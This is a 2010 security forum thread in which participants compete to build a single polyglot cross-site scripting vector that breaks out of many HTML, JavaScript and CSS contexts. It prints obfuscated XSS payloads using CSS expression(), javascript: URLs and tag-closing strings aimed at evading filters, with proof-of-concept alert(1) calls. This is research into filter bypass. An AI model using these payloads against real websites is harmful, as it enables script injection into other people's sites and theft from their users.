Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 09, 2010 08:13AM

After the success of my js compression challenge =) I thought it would be cool to try and figure out what I've been experimenting with. How many vectors can you fit into one vector. The idea is you take the following vector:-

">1<top -/style=-=expression&#40&#47;&#42;'/-/*&#39;,/**/alert(1)//&#41;;>"

and it works in all contexts :D so... x='vector'; or x="vector" or <input x="vector"> or <a onclick="x='vector'"> etc

Rules
-----
1. Only one payload e.g alert(1) must be called by all vectors no duplicates
2. The vector must work in all contexts you define
3. Most contexts wins and shortest overall vector
4. Any type of vuln is allowed :) SQLi, remote inclusion, xss etc

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 09/09/2010 08:15AM by Gareth Heyes.

Options: ReplyQuote
Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 15, 2010 03:25AM

Hmmm well I have 19 so far, can you beat that?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/15/2010 04:25AM by Gareth Heyes.

Options: ReplyQuote
Re: Challenge: How many vectors can you fit into one vector
Posted by: LeverOne
Date: September 15, 2010 07:22PM

1)
Quote

-o-link:javascript:eval(title)

should be:

-o-link:attr(name) ... name=javascript:alert(1)

2)
Quote

expression&#40&#47;&#42;'/-/*&#39;,/**/eval(name)//&#41;

should be:

expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*/&#41;

3)
Quote

</marquee></script></title></textarea></noscript></style></xmp>

- </marquee> - is not plaintext tag

+ </noembed>
+ </comment>
+ </xml>
+ </iframe>

4) VML behavior for <IMG> tag?

----------------------
~Veritas~



Edited 1 time(s). Last edit at 09/15/2010 08:05PM by LeverOne.

Options: ReplyQuote
Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 16, 2010 03:16AM

1) Yeah I can remove that now because originally it was not a img tag and so I had to use something that was also a global object but I figured out I could do "

Options: ReplyQuote
Re: Challenge: How many vectors can you fit into one vector
Posted by: LeverOne
Date: September 18, 2010 12:13AM

@Gareth

/reset

1) As I said, it does not work : <div style=x:expression(write(123)//)> (see my variant)

2) -=expr... - yes, this is your cool trick. But for quirks mode only! Why do you want these constraints? )

http://heideri.ch/jso/?quirks%20mode

3) As the world already knows, there are several forms to replace comments

http://heideri.ch/#39
http://heideri.ch/#91 [ B],[D]

-->]]>%>?>

4) There is always a tiny chance that some structures will not be interrupted. I mean

http://heideri.ch/#91 [C]

We can open any number of sections within other sections. But it is only in theory.

5) May be it might be better to add -ms-behavior:url(#default#time2) + onbegin , so this vector is able to work in compatibility mode for IE8+?

----------------------
~Veritas~



Edited 1 time(s). Last edit at 09/18/2010 12:42AM by LeverOne.

Options: ReplyQuote
Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 20, 2010 03:51AM

LeverOne Wrote:
-------------------------------------------------------
> @Gareth
>
> /reset
>
> 1) As I said, it does not work : (see my
> variant)

Yeah must have made a mistake when I tested it

> 2) -=expr... - yes, this is your cool trick. But
> for quirks mode only! Why do you want these
> constraints? )

It has to be valid javascript syntax to fit into the DOM xss rule as well. Maybe using top as a css prop name would work Would work as it is inside a regex :)

> http://heideri.ch/jso/?quirks%20mode
>
> 3) As the world already knows, there are several
> forms to replace comments
>
> http://heideri.ch/#39
> http://heideri.ch/#91 [ B],
>
> -->]]>%>?>

I guess I could add %> and ?> but there would be more severe problems anyway if these worked


>
> 4) There is always a tiny chance that some
> structures will not be interrupted. I mean
>
> http://heideri.ch/#91
>
> We can open any number of sections within other
> sections. But it is only in theory.
>
> 5) May be it might be better to add
> -ms-behavior:url(#default#time2) + onbegin , so
> this vector is able to work in compatibility mode
> for IE8+?

Cool idea yeah I'll add it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/20/2010 05:01AM by Gareth Heyes.

Options: ReplyQuote
Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 20, 2010 05:05AM

Seems to work DOM rules require a name assignment first:-

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">

Options: ReplyQuote
Re: Challenge: How many vectors can you fit into one vector
Posted by: rsnake
Date: January 05, 2011 11:26AM

Cool idea. May want to add variable width encoding escape here too... although technically it qualifies as an attribute escape, so maybe it gets you no extra points. Same deal with null bytes in HTML tags - not sure if that gives you extra points by those rules.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: January 14, 2011 08:37AM

@rsnake

Yeah those are valid as a filter could filter some HTML tags but miss null bytes too but anyway I got bored of this challenge after around 19 vectors and it becomes a pain in the ass to test after a while

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote


Sorry, only registered users may post in this forum.